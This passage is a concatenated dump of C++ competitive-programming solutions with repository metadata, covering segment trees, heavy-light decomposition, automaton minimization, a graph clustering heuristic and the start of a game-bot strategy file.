t.resize(n * 4 + 10);\n add.resize(n * 4 + 10, 0);\n //pos.resize(n * 4 + 10, 0);\n build(a, 1, 0, n - 1);\n }\n \n void update(int l, int r, T value)\n {\n update(1, 0, n - 1, l, r, value);\n }\n \n void update(int v, int tl, int tr, int l, int r, T value) \n {\n push(v, tl, tr);\n if (l > r)\n return;\n if (tl == l && tr == r)\n {\n t[v] += value;\n if (tl != tr)\n add[v * 2] += value,\n add[v * 2 + 1] += value;\n }\n else \n {\n int tm = (tl + tr) / 2;\n update(v * 2, tl, tm, l, min(r, tm), value);\n update(v * 2 + 1, tm + 1, tr, max(l, tm + 1), r, value);\n T left = t[v * 2];\n T right = 
t[v * 2 + 1];\n\n //if (left > right)\n //pos[v] = pos[v * 2];\n //else\n //pos[v] = pos[v * 2 + 1];\n t[v] = f(left, right);\n }\n }\n\n T get(int l, int r)\n {\n return get(1, 0, n - 1, l, r);\n }\n\n T get(int v, int tl, int tr, int l, int r) \n {\n push(v, tl, tr);\n if (l > r) return NEITRAL_ELEMENT;\n\n if (tl == l && tr == r)\n return t[v];\n else \n {\n int tm = (tl + tr) / 2;\n T left = get(v * 2, tl, tm, l, min(r, tm));\n T right = get(v * 2 + 1, tm + 1, tr, max(l, tm + 1), r);\n return f(left, right);\n }\n }\n\n};\n\n//heavyLight\ntemplate<typename T>\nstruct heavyLight \n{\n vector<T> a;\n segmentTree<T> tree;\n\n int n;\n int paths = 0;\n vector<int> sizes; //Size of subtree\n vector<int> depth; //Depth of vertex\n vector<int> parent; //Parent vertex\n vector<int> path; //Path to which vertex belongs (like disjoint set union)\n vector<int> heavy; //Heavy child if exists else -1\n vector<int> index; //Index of vertex in segment tree\n vector<int> first; //Highest vertex of path\n\n heavyLight(const vector<vector<int>>& g, const vector<T>& a) : tree(a) \n {\n this->a = a;\n n = g.size();\n sizes.resize(n, 1);\n depth.resize(n, 0);\n parent.resize(n, -1);\n path.resize(n, -1);\n heavy.resize(n, -1);\n index.resize(n, -1);\n first.resize(n, -1);\n\n auto dfs = [&](auto dfs, int u, int p) -> void\n {\n for (const int& v: g[u]) if (v != p)\n {\n depth[v] = depth[u] + 1;\n parent[v] = u;\n dfs(dfs, v, u);\n sizes[u] += sizes[v];\n }\n for (const int& v: g[u]) if (v != p)\n if (sizes[v] * 2 >= sizes[u])\n heavy[u] = v;\n };\n dfs(dfs, 0, -1);\n\n int cur = -1;\n fori(n)\n if (heavy[i] == -1)\n {\n int u = i;\n vector<int> currentPath;\n while (true)\n {\n currentPath.pb(u);\n path[u] = paths;\n int nu = parent[u];\n if (nu == -1 || heavy[nu] != u)\n break;\n u = nu;\n }\n\n reverse(all(currentPath));\n for (int v: currentPath)\n first[v] = u,\n index[v] = ++cur;\n ++paths;\n }\n }\n\n void upd(int u, int v, int one = 1)\n {\n if (u > v)\n swap(u, v);\n if 
(one == -1)\n {\n int x = min(u, v) + 1;\n int y = max(u, v);\n u = x;\n v = y;\n }\n tree.update(u, v, 1);\n }\n\n void update(int u, int v) \n {\n int l = path[u];\n int r = path[v];\n if (l == r)\n return upd(index[u], index[v], -1);\n if (depth[first[u]] < depth[first[v]])\n swap(u, v);\n upd(index[u], index[first[u]]);\n update(parent[first[u]], v);\n }\n};\n\n//}}}\n\nvoid run()\n{\n ints(n);\n vector<vector<int>> g(n);\n vector<array<int, 3>> edges;\n vector<int> ans(n - 1);\n fori(n - 1)\n {\n ints(u, v); --u; --v;\n g[u].pb(v);\n g[v].pb(u);\n edges.pb({u, v, i});\n }\n heavyLight hld(g, vector(n, 0));\n ints(q);\n fori(q)\n {\n ints(u, v); --u; --v;\n hld.update(u, v);\n }\n for (auto& [u, v, i]: edges)\n {\n int x = hld.depth[u] < hld.depth[v] ? v : u;\n x = hld.index[x];\n ans[i] = hld.tree.get(x, x);\n }\n writeln(ans);\n}\n\n//{{{\nint main()\n{\n ios_base::sync_with_stdio(false); cin.tie(0);\n run();\n cerr << fixed << setprecision(0) << \"Execution time = \" << 1000.0 * clock() / CLOCKS_PER_SEC << \"ms\\n\";\n return 0;\n}\n\n#define a _a\n#define n _n\nttt12i ostream&operator<<(ostream&os,pair<T1,T2>const&a);\ntemplate<typename T,typename D=decltype(*begin(declval<T>())),typename enable_if<!is_same<T,basic_string<char>>::value>::type* =nullptr>\nostream&operator<<(ostream&os,T const&a){auto it=begin(a);if(it!=end(a))os<<*it++;while(it!=end(a))os<<\"\\n \"[is_fundamental<typename T::value_type>::value]<<*it++;return os;}\nttt12i ostream&operator<<(ostream&os,pair<T1,T2>const&a){return os<<a.first<<\" \"<<a.second;}\nttt12i istream&operator>>(istream&is,pair<T1,T2>&a){return is>>a.first>>a.second;}\nttti istream&operator>>(istream&is,vector<T>&a){fori(a.size())is>>a[i];return is;}\nttti void print(T&&a){cout<<\" \"<<a;}\nttti void priws(T&&a){cout<<a;}\nttti void read(T&a){cin>>a;} //}}}\n" }, { "alpha_fraction": 0.3877171277999878, "alphanum_fraction": 0.3965570628643036, "avg_line_length": 25.75103759765625, "blob_id": 
"41108876bf3c3aa403faa76be22e5cbbf4086ba4", "content_id": "1605296f031e3e1008b38db8f57783c2a06ab65d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 6448, "license_type": "no_license", "max_line_length": 928, "num_lines": 241, "path": "/trash/mimimization.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "\n#include <cstdlib>\n#include <iostream>\n#include <stdio.h>\n#include <vector>\n#include <set>\n#include <algorithm>\n#include <queue>\n#include <string>\n#include <stack>\n\n#define enter printf(\"\\n\");\n#define pb push_back\n#define ll long long\n#define fors(it, r) for (set<int>::iterator it = r.begin(); it != r.end(); it++)\n#define forvit(it, r) for (vector<int>::iterator it = r.begin(); it != r.end(); it++)\n#define forv(i, vector) for (int i = 0; i < vector.size(); i++)\n#define forn(i, n) for (int i = 0; i < n; i++)\n#define vi vector<int>\n#define sigma 26\n\nusing namespace std;\nint INF = 1000000007;\nstring FILENAME = \"minimization\";\nstring FILEINPUT = FILENAME;\n\nvoid writeln(int a){printf(\"%d\\n\", a);}void writeln(int a, int b){printf(\"%d %d\\n\", a, b);}void writeln(int a, int b, int c){printf(\"%d %d %d\\n\", a, b, c);}void writeln(int a, int b, int c, int d){printf(\"%d %d %d %d\\n\", a, b, c, d);}void write(int a){printf(\"%d\", a);}void write(int a, int b){printf(\"%d %d\", a, b);}void write(int a, int b, int c){printf(\"%d %d %d\", a, b, c);}void write(int a, int b, int c, int d){printf(\"%d %d %d %d\", a, b, c, d);}void read(int &a){scanf(\"%d\", &a);}void read(int &a, int &b){scanf(\"%d %d\", &a, &b);}void read(int &a, int &b, int &c){scanf(\"%d %d %d\", &a, &b, &c);}void read(int &a, int &b, int &c, int &d){scanf(\"%d %d %d %d\", &a, &b, &c, &d);}void readln(int &a){scanf(\"%d\\n\", &a);}void readln(int &a, int &b){scanf(\"%d %d\\n\", &a, &b);}void readln(int &a, int &b, int &c){scanf(\"%d %d %d\\n\", &a, &b, &c);}void readln(int &a, int &b, int &c, int 
&d){scanf(\"%d %d %d %d\\n\", &a, &b, &c, &d);}\nvoid readln(vector<int> &f, int n){int x;for (int i = 1; i <= n; i++){read(x);f.push_back(x);}}void writeln(vector<int> &f){for (int i = 0; i < f.size(); i++)printf(\"%d%c\", f[i], i == f.size() - 1 ? '\\n' : ' ');}\n\nstruct dsu\n{\n vi a, id;\n int n, m;\n dsu(int n)\n {\n this->n = n;\n id.resize(n, n);\n forn(i, n)\n a.pb(i);\n }\n\n int get(int i)\n {\n return a[i] == i ? i : a[i] = get(a[i]);\n }\n\n void uni(int i, int j)\n {\n i = get(i);\n j = get(j);\n if (i == j)\n return;\n a[i] = a[j];\n }\n\n void getId()\n {\n int counter = 0;\n forn(i, n)\n if (id[get(i)] == n)\n id[get(i)] = counter++;\n m = counter;\n }\n};\n\nstruct aut\n{\n int n, m, k;\n vector<bool> ok, useful;\n vector< vi > a;\n vector< vector< vi > > b;\n\n aut(int n)\n {\n this->n = n;\n m = 0;\n k = 0;\n ok.resize(n + 2, false);\n a.resize(n + 2);\n forn(i, n)\n a[i].resize(sigma, n);\n }\n\n aut()\n {\n int x, y;\n char c;\n readln(n, m, k);\n ok.resize(n + 2, false);\n useful.resize(n + 2, false);\n a.resize(n + 2);\n b.resize(n + 2);\n queue<int> q;\n forn(i, n + 1)\n a[i].resize(sigma + 1, n),\n b[i].resize(sigma + 1);\n forn(i, k)\n {\n read(x);\n ok[x - 1] = true;\n q.push(x - 1);\n useful[x - 1] = true;\n }\n forn(i, m)\n {\n scanf(\"%d %d %c\\n\", &x, &y, &c);\n a[x - 1][c - 'a'] = y - 1;\n b[y - 1][c - 'a'].pb(x - 1);\n }\n while (!q.empty())\n {\n int v = q.front();\n q.pop();\n useful[v] = true;\n forn(i, sigma)\n forvit(j, b[v][i])\n if (*j != n && !useful[*j])\n q.push(*j);\n }\n forn(i, n)\n forn(j, sigma)\n if (a[i][j] == n)\n b[n][j].pb(i);\n// forn(i, n)\n // printf(\"%d \", (int)useful[i]);\n // cout << endl;\n }\n\n void write()\n {\n writeln(n, m, k);\n forn(i, n)\n if (ok[i])\n printf(\"%d \", i + 1);\n printf(\"\\n\");\n forn(i, n)\n forn(j, sigma)\n if (a[i][j] != n)\n printf(\"%d %d %c\\n\", i + 1, a[i][j] + 1, 'a' + j);\n }\n};\n\nvoid debug(aut& a, vector< vector<bool> >& p)\n{\n printf(\" \");\n forn(i, a.n + 1)\n 
printf(\"%c \", 'A' + i);\n printf(\"\\n\");\n forn(i, a.n + 1)\n {\n printf(\"%c \", 'A' + i);\n forn(j, a.n + 1)\n printf(\"%d%c\", (int)p[i][j], j == a.n ? '\\n' : ' ');\n }\n}\n\naut minimization(aut& a)\n{\n //aut b(a.n);\n vector< vector<bool> > p;\n vi id;\n p.resize(a.n + 1);\n id.resize(a.n, -1);\n forn(i, a.n)\n p[i].resize(a.n, false);\n queue< pair<int, int> > q;\n forn(i, a.n)\n p[i][i] = true;\n forn(i, a.n + 1)\n for (int j = i + 1; j <= a.n; j++)\n if (a.ok[i] != a.ok[j] || !a.useful[i] || !a.useful[j])\n q.push({i, j}),\n p[i][j] = true,\n p[j][i] = true;\n debug(a, p);\n int l, f;\n while (!q.empty())\n {\n f = q.front().first;\n l = q.front().second;\n q.pop();\n forn(i, sigma)\n if (a.b[f][i].size() > 0 && a.b[l][i].size() > 0)\n forvit(j, a.b[f][i])\n forvit(k, a.b[l][i])\n if (!p[*j][*k])\n q.push({*j, *k}),\n p[*j][*k] = true,\n p[*k][*j] = true;\n }\n debug(a, p);\n /*dsu ds(a.n);\n forn(i, a.n)\n forn(j, a.n)\n if (!p[i][j])\n ds.uni(i, j);*/\n int counter = 0;\n forn(i, a.n)\n {\n if (id[i] == -1)\n id[i] = counter++;\n\n forn(j, a.n)\n if (!p[i][j])\n id[j] = id[i];\n }\n// writeln(b.n, counter);\n forn(i, a.n)\n if (!a.useful[i])\n counter--;\n aut b(counter);//b.n = counter;\n forn(i, a.n)\n {\n if (!a.useful[i])\n continue;\n if (a.ok[i])\n if (!b.ok[id[i]])\n b.ok[id[i]] = true,\n b.k++;\n forn(j, sigma)\n if (a.a[i][j] != a.n && b.a[id[i]][j] == a.n && a.useful[a.a[i][j]])\n b.a[id[i]][j] = id[a.a[i][j]],\n b.m++;\n }\n// writeln(100500);\n// debug(a, p);\n return b;\n}\n\nvoid run()\n{\n aut a;\n aut mn = minimization(a);\n mn.write();\n}\n\nint main()\n{\n freopen(FILEINPUT.append(\".in\").c_str(), \"r\", stdin); //freopen(FILENAME.append(\".out\").c_str(), \"w\", stdout);\n run();\n return 0;\n}\n" }, { "alpha_fraction": 0.47355473041534424, "alphanum_fraction": 0.49815496802330017, "avg_line_length": 26.100000381469727, "blob_id": "4e333f532ec8ab7670edc9c69387b5a4e1d4f7d2", "content_id": 
"935b84dbef3260e70301acb2be0a10274fafcf69", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1626, "license_type": "no_license", "max_line_length": 67, "num_lines": 60, "path": "/TopCoder/TC641/A.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "//template igorjan94 version from 05 December 2014\n#include <bits/stdc++.h>\n\n#define forit(it, r) for (auto it = r.begin(); it != r.end(); it++)\n#define FOR(i, m, n) for (int i = m; i < n; ++i)\n#define ROF(i, m, n) for (int i = m; i >= n; --i)\n#define forn1(i, n) for (int i = 1; i < n; ++i)\n#define forn(i, n) for (int i = 0; i < n; ++i)\n#define fori1(n) for (int i = 1; i < n; ++i)\n#define forj1(n) for (int j = 1; j < n; ++j)\n#define fori(n) for (int i = 0; i < n; ++i)\n#define forj(n) for (int j = 0; j < n; ++j)\n\n#define fst first\n#define cnd second\n#define pb push_back\n#define ll long long\n#define vi vector<int>\n#define pii pair<int, int>\n#define vll vector<long long>\n#define vvi vector<vector<int> >\n#define pll pair<long long, long long>\n#define whole(a) a.begin(), a.end()\n\n#define argmax(a) max_element(whole(a)) - (a).begin()\n#define argmin(a) min_element(whole(a)) - (a).begin()\n\n#ifndef ONLINE_JUDGE\n#define lld I64d\n#endif\n\n#define FILENAME \"input\"\n#define INF 1000000007\n#define DOUBLEFORMAT \"%f\"\n\nusing namespace std;\n\n#define method int meet(int t, vi q, vi p)\n\n#define classname BuyingTshirts\n\nclass classname\n{\n public :\n method\n {\n int ans = 0;\n int sum1 = 0, sum2 = 0;\n fori(q.size())\n {\n sum1 += q[i];\n sum2 += p[i];\n if (sum1 >= t && sum2 >= t)\n ans++;\n sum1 %= t;\n sum2 %= t;\n }\n return ans;\n }\n};\n" }, { "alpha_fraction": 0.45078831911087036, "alphanum_fraction": 0.46961578726768494, "avg_line_length": 30.408653259277344, "blob_id": "5eb61c434c9e1f0ab3ad3e685cba6ca94170a94f", "content_id": "f596b1176af00cef285ef7619e00fa0ac8449817", "detected_licenses": [], "is_generated": false, 
"is_vendor": false, "language": "C++", "length_bytes": 6533, "license_type": "no_license", "max_line_length": 174, "num_lines": 208, "path": "/CodeForce/1378/A.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "// Igorjan94, template version from 13 October 2017. C++17 version, modified 18 march 2020 (writeln<tuple>, whole->all) {{{\n#include <bits/stdc++.h>\n\nusing namespace std;\n\n#define FOR(i, m, n) for (int i = m; i < (int) (n); ++i)\n#define ROF(i, m, n) for (int i = m; i >= (int) (n); --i)\n#define forn(i, n) for (int i = 0; i < (int) (n); ++i)\n#define fori1(n) for (int i = 1; i < (int) (n); ++i)\n#define forj1(n) for (int j = 1; j < (int) (n); ++j)\n#define fori(n) for (int i = 0; i < (int) (n); ++i)\n#define forj(n) for (int j = 0; j < (int) (n); ++j)\n#define SZ(a) int(size(a))\n\ntypedef pair<int, int> pii;\ntypedef vector<int> vi;\ntypedef long long ll;\n\n#define pb push_back\n#define all(a) begin(a), end(a)\n#define ints(a...) int a; readln(a)\n\n[[maybe_unused]] const int MOD = 1000000007;\n[[maybe_unused]] const int INTMAX = numeric_limits<int>::max();\n\n#define ttt12i template<class T1, class T2> inline\n#define ttti template<class T> inline\n\nvoid writeln(){cout<<\"\\n\";}ttti void print(T&& a);ttti void priws(T&& a);ttti void read(T& a);\ntemplate<class... Args> inline void readln(Args&... 
args){(read(args),...);}\ntemplate<class H, class...T> inline void writeln(H&& h,T&&...t){priws(h);(print(t),...);writeln();}\n\n//Igorjan\n//}}}\n\n\nstatic const int ITERATIONS = 1;\nstatic const int N = 200000;\nvector<vector<int>> g(N);\nvector<int> d(N);\nunordered_set<int> V;\nint E = 0;\n\ndouble getScore(const vector<vector<int>>& x)\n{\n unordered_set<int> V1;\n for (const auto& c: x)\n for (const int& u: c)\n V1.insert(u);\n if (V1 != V)\n {\n writeln(\"Not all vertices are in components or some are included more than once\");\n exit(1);\n }\n\n auto ein = [&](const vector<int>& c) {\n unordered_set s(all(c));\n int edges = 0;\n for (const int& u: c)\n for (const int& v: g[u])\n edges += s.find(v) != s.end();\n return edges / 2.0;\n };\n\n auto eout = [&](const vector<int>& c) {\n int s = 0;\n for (const int& u: c)\n s += d[u];\n return s / 2.0 / E;\n };\n\n auto density = [&](const vector<int>& c) {\n int n = c.size();\n if (n == 1)\n return 1.0;\n else\n return ein(c) * 2.0 / n / (n - 1);\n };\n\n auto modularity = [&](const vector<vector<int>>& x) {\n double ans = 0.0;\n for (const auto& c: x)\n ans += ein(c) / E - pow(eout(c), 2.0);\n return ans;\n };\n \n auto regularization = [&](const vector<vector<int>>& x) {\n double ans = 0.0;\n for (const auto& c: x)\n ans += density(c);\n return 0.5 * (ans / x.size() - x.size() * 1.0 / V.size());\n };\n\n return (1.0 + modularity(x) + regularization(x)) * 100000.0;\n}\n\nvoid run()\n{\n mt19937 rng(chrono::steady_clock::now().time_since_epoch().count());\n cerr << fixed << setprecision(3);\n int u, v;\n while (cin >> u >> v)\n ++E,\n V.insert(u),\n V.insert(v),\n d[u]++,\n d[v]++,\n g[u].pb(v),\n g[v].pb(u);\n int n = SZ(V);\n vector<vector<int>> ans;\n double answer = 0;\n forn(q, ITERATIONS)\n {\n vector<vector<int>> cur;\n\n vector<int> used(n, -1);\n set<pii> degrees;\n fori(n) degrees.emplace(-d[i], i);\n while (degrees.size())\n {\n auto [_, u] = *degrees.begin();\n degrees.erase(degrees.begin());\n if 
(used[u] != -1) continue;\n used[u] = cur.size();\n cur.pb({u});\n for (const int& v: g[u])\n if (used[v] == -1)\n used[v] = used[u],\n cur[used[u]].pb(v);\n }\n\n int lastSize = 0;\n forn(qqq, 15)\n {\n set<pii> sizes;\n fori(cur.size())\n sizes.emplace(cur[i].size(), i);\n if (lastSize == cur.size()) break;\n lastSize = cur.size();\n cerr << \"COMPS: \" << lastSize << endl;\n while (!sizes.empty())\n {\n auto [sz, comp] = *sizes.begin();\n sizes.erase(sizes.begin());\n map<int, int> m;\n for (int u: cur[comp])\n for (int v: g[u])\n m[used[v]]++;\n int toMerge = -1;\n int X = -1;\n\n if (m.size() >= 80)\n continue;\n for (const auto& [k, v]: m)\n if (k != comp)\n if (v > X)\n X = v, toMerge = k;\n //if (X > 1)\n //cerr << X << \" \" << sz << endl;\n if (X < m[comp] || toMerge == -1 || (sz > 1 && X < sz * sqrt(3))) continue;\n for (int u: cur[comp])\n used[u] = toMerge,\n cur[toMerge].pb(u);\n cur[comp].clear();\n }\n for (int i = 0; i < SZ(cur); )\n if (cur[i].size() == 0)\n swap(cur[i], cur.back()),\n cur.pop_back();\n else\n ++i;\n fori(cur.size())\n for (int u: cur[i])\n used[u] = i;\n }\n\n double temp = getScore(cur);\n cerr << \"ITERATION \" << (q + 1) << \" / \" << ITERATIONS << \", curScore \" << temp << \", maxScore \" << answer << endl;\n if (temp > answer)\n answer = temp,\n ans = cur;\n }\n for (const auto& u: ans)\n if (u.size())\n writeln(u);\n}\n\n//{{{\nint main()\n{\n ios_base::sync_with_stdio(false);\n run();\n cerr << fixed << setprecision(0) << \"Execution time = \" << 1000.0 * clock() / CLOCKS_PER_SEC << \"ms\\n\";\n return 0;\n}\n\n#define a _a\n#define n _n\nttt12i ostream&operator<<(ostream&os,pair<T1,T2>const&a);\ntemplate<typename T,typename D=decltype(*begin(declval<T>())),typename enable_if<!is_same<T,basic_string<char>>::value>::type* =nullptr>\nostream&operator<<(ostream&os,T const&a){auto it=begin(a);if(it!=end(a))os<<*it++;while(it!=end(a))os<<\"\\n \"[is_fundamental<typename T::value_type>::value]<<*it++;return os;}\nttt12i 
ostream&operator<<(ostream&os,pair<T1,T2>const&a){return os<<a.first<<\" \"<<a.second;}\nttt12i istream&operator>>(istream&is,pair<T1,T2>&a){return is>>a.first>>a.second;}\nttti istream&operator>>(istream&is,vector<T>&a){fori(a.size())is>>a[i];return is;}\nttti void print(T&&a){cout<<\" \"<<a;}\nttti void priws(T&&a){cout<<a;}\nttti void read(T&a){cin>>a;} //}}}\n" }, { "alpha_fraction": 0.4635503590106964, "alphanum_fraction": 0.4833982586860657, "avg_line_length": 29.286516189575195, "blob_id": "2f9d99f6debfabaecca89dc2c77eb73babaf18d9", "content_id": "2c4e1cafaa9f14f164dd67b0213a6eab70f5cc22", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 5391, "license_type": "no_license", "max_line_length": 174, "num_lines": 178, "path": "/2020/snws5/D.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "// Igorjan94, template version from 13 October 2017. C++17 version, modified 14 september 2019 (writeln<T>, main) {{{\n#include <bits/stdc++.h>\n\nusing namespace std;\n\n#define FOR(i, m, n) for (int i = m; i < (int) (n); ++i)\n#define ROF(i, m, n) for (int i = m; i >= (int) (n); --i)\n#define forn(i, n) for (int i = 0; i < (int) (n); ++i)\n#define fori1(n) for (int i = 1; i < (int) (n); ++i)\n#define forj1(n) for (int j = 1; j < (int) (n); ++j)\n#define fori(n) for (int i = 0; i < (int) (n); ++i)\n#define forj(n) for (int j = 0; j < (int) (n); ++j)\n#define SZ(a) int(size(a))\n\ntypedef pair<int, int> pii;\ntypedef vector<int> vi;\ntypedef long long ll;\n\n#define pb push_back\n#define whole(a) begin(a), end(a)\n#define next next__\n#define prev prev__\n#define count count__\n\n#define ints(a...) int a; readln(a)\n#define wr(args...) err(#args, args)\n\n#define ttt12i template<class T1, class T2> inline\n#define tthti template<class H, class...T> inline\n#define ttta template<class... 
Args> inline\n#define ttti template<class T> inline\n\nconst int MOD = 1000000007;\nconst int INTMAX = numeric_limits<int>::max();\n\nvoid writeln(){cout<<\"\\n\";}ttti void print(T&& a);ttti void priws(T&& a);ttti void read(T& a);\nttta void readln(Args&... args){(read(args),...);}tthti void writeln(H&& h,T&&...t){priws(h);(print(t),...);writeln();}\nvector<string>split(string&s,string d){vector<string>v;size_t p=0;while((p=s.find(d))!=string::npos)v.pb(s.substr(0,p)),s.erase(0,p+d.length());v.pb(s);return v;}\nttta void err(string v,Args...args){auto vv=split(v,\", \");auto it=vv.begin();(writeln(*it++,\"=\",args),...);}\n\n//Igorjan\n//segmentTree\n//0-indexed, [l..r]\ntemplate<typename T>\nstruct segmentTree\n{\n int n;\n vector<vector<T>> t, prefix;\n vector<T> mx, pos;\n\n void build(vector<T>& a, int v, int l, int r)\n {\n if (l == r)\n t[v] = {a[l]},\n prefix[v].pb(a[l]);\n else \n {\n int m = (l + r) / 2;\n build(a, v * 2, l, m);\n build(a, v * 2 + 1, m + 1, r);\n merge(t[v * 2].begin(), t[v * 2].end(), t[v * 2 + 1].begin(), t[v * 2 + 1].end(), back_inserter(t[v]));\n for (T& x: t[v]) prefix[v].pb(prefix[v].back() + x);\n }\n };\n\n segmentTree(vector<T>& a)\n {\n n = a.size();\n t.resize(n * 4);\n prefix.resize(n * 4, vector<T>(1, 0));\n mx.resize(n * 4);\n pos.resize(n * 4);\n build(a, 1, 0, n - 1);\n }\n\n T get(int l, int r, T x)\n {\n return get(1, 0, n - 1, l, r, 0, x);\n }\n\n T get(int v, int tl, int tr, int l, int r, int curmx, T x) {\n curmx += mx[v];\n if (l > r)\n return 0;\n if (l == tl && tr == r) {\n int new_pos = upper_bound(t[v].begin() + pos[v], t[v].end(), x - curmx) - t[v].begin();\n T s = (SZ(t[v]) - new_pos) * x;\n T p = prefix[v][new_pos] - prefix[v][pos[v]];\n p += curmx * (new_pos - pos[v]);\n s += pos[v] * min(x, curmx);\n pos[v] = new_pos;\n mx[v] -= x;\n wr(l, r, p, s, curmx, x);\n writeln();\n return s + p;\n }\n int tm = (tl + tr) / 2;\n return get(v * 2, tl, tm, l, min(r, tm), curmx, x) + get(v * 2 + 1, tm + 1, tr, max(l, tm 
+ 1), r, curmx, x);\n }\n\n void update(int l, int r, T value)\n {\n update(1, 0, n - 1, l, r, value);\n }\n\n void update(int v, int tl, int tr, int l, int r, T add) {\n if (l > r)\n return;\n if (l == tl && tr == r)\n mx[v] += add;\n else {\n int tm = (tl + tr) / 2;\n update(v * 2, tl, tm, l, min(r, tm), add);\n update(v * 2 + 1, tm + 1, tr, max(l, tm + 1), r, add);\n }\n }\n};\n\n//}}}\n\nvoid run()\n{\n ints(n);\n vi a(n);\n readln(a);\n segmentTree<int> s(a);\n\n writeln();\n fori1(n * 2)\n writeln(i, s.t[i]);\n\n ints(q);\n forn(_, q)\n {\n ints(t, i, j, k);\n --i;\n --j;\n if (t == 1)\n {\n s.update(i, j, k);\n FOR(w, i, j + 1)\n a[w] += k;\n }\n else\n {\n int sum = 0;\n FOR(w, i, j + 1)\n {\n sum += min(a[w], k);\n a[w] = max(0, a[w] - k);\n }\n wr(sum);\n writeln(s.get(i, j, k));\n }\n writeln(a);\n }\n}\n\n//{{{\nint main()\n{\n ios_base::sync_with_stdio(false);\n run();\n cerr << fixed << setprecision(0) << \"Execution time = \" << 1000.0 * clock() / CLOCKS_PER_SEC << \"ms\\n\";\n return 0;\n}\n\n#define a _a\n#define n _n\nttt12i ostream&operator<<(ostream&os,pair<T1,T2>const&a);\ntemplate<typename T,typename D=decltype(*begin(declval<T>())),typename enable_if<!is_same<T,basic_string<char>>::value>::type* =nullptr>\nostream&operator<<(ostream&os,T const&a){auto it=begin(a);if(it!=end(a))os<<*it++;while(it!=end(a))os<<\"\\n \"[is_fundamental<typename T::value_type>::value]<<*it++;return os;}\nttt12i ostream&operator<<(ostream&os,pair<T1,T2>const&a){return os<<a.first<<\" \"<<a.second;}\nttt12i istream&operator>>(istream&is,pair<T1,T2>&a){return is>>a.first>>a.second;}\nttti istream&operator>>(istream&is,vector<T>&a){fori(a.size())is>>a[i];return is;}\nttti void print(T&&a){cout<<\" \"<<a;}\nttti void priws(T&&a){cout<<a;}\nttti void read(T&a){cin>>a;} //}}}\n" }, { "alpha_fraction": 0.3637327551841736, "alphanum_fraction": 0.38388124108314514, "avg_line_length": 20.454545974731445, "blob_id": "387bb7a23417aad9701391caca27cc2185327953", "content_id": 
"274e7dd6168affb2d8890cd43080f0e15cfb4715", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 943, "license_type": "no_license", "max_line_length": 46, "num_lines": 44, "path": "/trains/neerc/neerc.ifmo.ru.train.2014.10.28/BWA.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#include <bits/stdc++.h>\n \n#define mp make_pair\n#define pb push_back\n#define all(a) (a).begin(), (a).end()\n#define sz(a) (int)a.size()\n#define fst first\n#define snd second\n#define fori(n) for(int i = 0; i < n; ++i)\n#define fori1(n) for(int i = 1; i < n; ++i)\n#define forj(n) for(int j = 0; j < n; ++j)\n \nusing namespace std;\n \nvector <pair <int, int> > ans;\nint a[1239];\n \nint main()\n{\n int n, k;\n cin >> n >> k;\n for (int i = 0; i < n; ++i)\n cin >> a[i];\n cout << \"Yes\" << endl;\n if (n == k)\n for (int i = 0; i < n; ++i){\n if (a[i] + 1)\n cout << a[i] << \" \" << i + 1;\n else\n cout << i + 1 << \" \" << i + 1;\n cout << endl;\n }\n else {\n for (int i = 0; i < n; ++i){\n if (a[i] + 1)\n cout << a[i] << \" \" << 1;\n else\n cout << 1 << \" \" << 1;\n cout << endl;\n }\n }\n \n \n}" }, { "alpha_fraction": 0.38357529044151306, "alphanum_fraction": 0.4268178641796112, "avg_line_length": 31.716386795043945, "blob_id": "34649822b79ae1c6b6668fa1eea05a7386c979f2", "content_id": "e3b15c634272555214697c34e24deea088d707a5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 16148, "license_type": "no_license", "max_line_length": 169, "num_lines": 476, "path": "/trains/ai/cpp-cgdk/Old.hpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#include \"MyStrategy.h\"\r\n\r\n#define PI 3.14159265358979323846\r\n#define _USE_MATH_DEFINES\r\n\r\n#include <bits/stdc++.h>\r\n#ifdef debug\r\n#include <library.h>\r\n#endif\r\n\r\nusing namespace model;\r\nusing namespace std;\r\n\r\ndouble DIST_TO_NEXT = 750;\r\nint COUNT_OF_FAILS = 100;\r\nint FORCE_BACK 
= 130;\r\nint FORCE_RIGHT = 60;\r\nint FORCE = 100;\r\nint BREAK = 30;\r\ndouble MAX_SPEED = 13.8;\r\nint FORCE_SLOW_DOWN = 1;\r\nint GLOBAL_FAIL = 2;\r\ndouble ANGLE_THROW = PI / 30;\r\n\r\nbool changed = false;\r\ndouble eps = 5;\r\ndouble power = 0.85;\r\ndouble distToNext = -10000, prevDistance;\r\nint countOfFails = 0;\r\nint forceBack = 0;\r\nint forceRight = 0;\r\nint force = 0;\r\nint prevx = 0;\r\nint currx = -1234;\r\nint forceSlow = 0;\r\nint globalFail = 0;\r\ndouble turn = 0.0;\r\ndouble tileSize = 0.0;\r\nint dir[15][4];\r\nvector<int> dx = {1, 0, -1, 0};\r\nvector<int> dy = {0, 1, 0, -1};\r\nbool init = true;\r\n\r\nvoid ppp(vector<vector<int>> a)\r\n{\r\n int n = a.size();\r\n int m = a[0].size();\r\n for (int j = 0; j < m; ++j)\r\n for (int i = 0; i < n; ++i)\r\n printf(\"%6d%c\", a[i][j], \"\\n \"[i != n - 1]);\r\n}\r\n\r\nbool isCorner(TileType a) \r\n{\r\n return !(a == VERTICAL || a == HORIZONTAL || a == CROSSROADS);\r\n}\r\n\r\nvoid MyStrategy::move(const Car& self, const World& world, const Game& game, Move& move) {\r\n if (init)\r\n {\r\n init = false;\r\n#ifdef debug\r\n writeln(world.getWaypoints());\r\n#endif\r\n srand(game.getRandomSeed());\r\n }\r\n tileSize = game.getTrackTileSize();\r\n auto a = world.getTilesXY();\r\n prevx = currx;\r\n if (prevx == -1234)\r\n prevx = self.getX();\r\n currx = self.getX();\r\n if (currx - prevx 